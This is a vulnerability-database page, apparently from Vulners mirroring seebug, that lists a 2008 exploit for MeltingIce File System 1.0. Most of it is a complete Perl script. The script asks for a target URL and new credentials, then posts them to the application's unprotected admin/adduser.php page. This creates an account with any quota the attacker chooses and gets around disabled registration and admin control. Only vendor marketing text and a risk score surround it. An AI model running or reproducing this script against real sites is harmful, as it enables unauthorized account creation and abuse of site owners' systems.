Lucene search
K

MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit

🗓️ 19 May 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 8 Views

MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit. This Perl script exploits a vulnerability in MeltingIce File System <= 1.0, allowing an attacker to add a user with a specified quota via the admin panel

Code

                                                #!/usr/bin/perl

use&nbsp;strict;
use&nbsp;LWP::UserAgent;

#&nbsp;NOTE:&nbsp;user&nbsp;a&nbsp;pretty&nbsp;uniqe&nbsp;username,&nbsp;has&nbsp;the&nbsp;script&nbsp;will&nbsp;say&nbsp;successfull&nbsp;if&nbsp;a&nbsp;username&nbsp;aready&nbsp;existed!
#&nbsp;NOTE:&nbsp;exploit&nbsp;is&nbsp;mainly&nbsp;to&nbsp;get&nbsp;a&nbsp;nice&nbsp;quota,&nbsp;but&nbsp;it&nbsp;can&nbsp;also&nbsp;to&nbsp;be&nbsp;used&nbsp;to&nbsp;add&nbsp;a&nbsp;user&nbsp;primeraly&nbsp;because&nbsp;alot&nbsp;of&nbsp;these&nbsp;sites&nbsp;doesnt&nbsp;allow&nbsp;registration.
#&nbsp;Script&nbsp;Download:&nbsp;http://downloads.sourceforge.net/meltingicefs

print&nbsp;&quot;[*]&nbsp;---&nbsp;[&nbsp;MeltingIce&nbsp;File&nbsp;System&nbsp;&lt;=&nbsp;1.0&nbsp;Remote&nbsp;Arbitrary&nbsp;Add-User&nbsp;]&nbsp;---&nbsp;[*]\n&quot;;
print&nbsp;&quot;[*]&nbsp;---Discovered&nbsp;&amp;&amp;&nbsp;Coded&nbsp;By:&nbsp;t0pP8uZz&nbsp;/&nbsp;Discovered&nbsp;On:&nbsp;17&nbsp;MAY&nbsp;2008---&nbsp;[*]\n&quot;;
print&nbsp;&quot;[*]&nbsp;---&nbsp;MeltingIce&nbsp;is&nbsp;a&nbsp;file&nbsp;hosting&nbsp;script,&nbsp;this&nbsp;exploit&nbsp;will&nbsp;add&nbsp;&nbsp;---&nbsp;[*]\n&quot;;
print&nbsp;&quot;[*]&nbsp;---&nbsp;a&nbsp;user&nbsp;via&nbsp;the&nbsp;admin&nbsp;panel,&nbsp;and&nbsp;give&nbsp;it&nbsp;a&nbsp;specified&nbsp;quota.&nbsp;&nbsp;---&nbsp;[*]\n&quot;;
print&nbsp;&quot;[*]&nbsp;---&nbsp;[&nbsp;MeltingIce&nbsp;File&nbsp;System&nbsp;&lt;=&nbsp;1.0&nbsp;Remote&nbsp;Arbitrary&nbsp;Add-User&nbsp;]&nbsp;---&nbsp;[*]\n&quot;;

print&nbsp;&quot;\nEnter&nbsp;URL(http://site.com/):&nbsp;&quot;;
	chomp(my&nbsp;$url=&lt;STDIN&gt;);
	
print&nbsp;&quot;\nUsername(create's&nbsp;your&nbsp;username):&nbsp;&quot;;
	chomp(my&nbsp;$usr=&lt;STDIN&gt;);
	
print&nbsp;&quot;\nPassword(create's&nbsp;your&nbsp;password):&nbsp;&quot;;
	chomp(my&nbsp;$pwd=&lt;STDIN&gt;);
	
print&nbsp;&quot;\nEnter&nbsp;Quota(quota(mb)&nbsp;of&nbsp;space&nbsp;you&nbsp;want,&nbsp;ie:9999):&nbsp;&quot;;
	chomp(my&nbsp;$qta=&lt;STDIN&gt;);

my&nbsp;$ua&nbsp;=&nbsp;LWP::UserAgent-&gt;new(&nbsp;agent&nbsp;=&gt;&nbsp;&quot;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)&quot;&nbsp;);
my&nbsp;$ob&nbsp;=&nbsp;$ua-&gt;post($url.&quot;/admin/adduser.php&quot;,&nbsp;{&nbsp;&quot;newusername&quot;&nbsp;=&gt;&nbsp;$usr,&nbsp;&quot;newpassword&quot;&nbsp;=&gt;&nbsp;$pwd,&nbsp;&quot;newquota&quot;&nbsp;=&gt;&nbsp;$qta&nbsp;}&nbsp;);

#is_success&nbsp;was&nbsp;acting&nbsp;strangely,&nbsp;so&nbsp;i&nbsp;had&nbsp;to&nbsp;do&nbsp;without.
print&nbsp;&quot;Completed!&nbsp;Try&nbsp;logging&nbsp;in&nbsp;&quot;.$url.&quot;\n&quot;;&nbsp;
exit;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2008 00:00Current
7.1High risk
Vulners AI Score7.1
8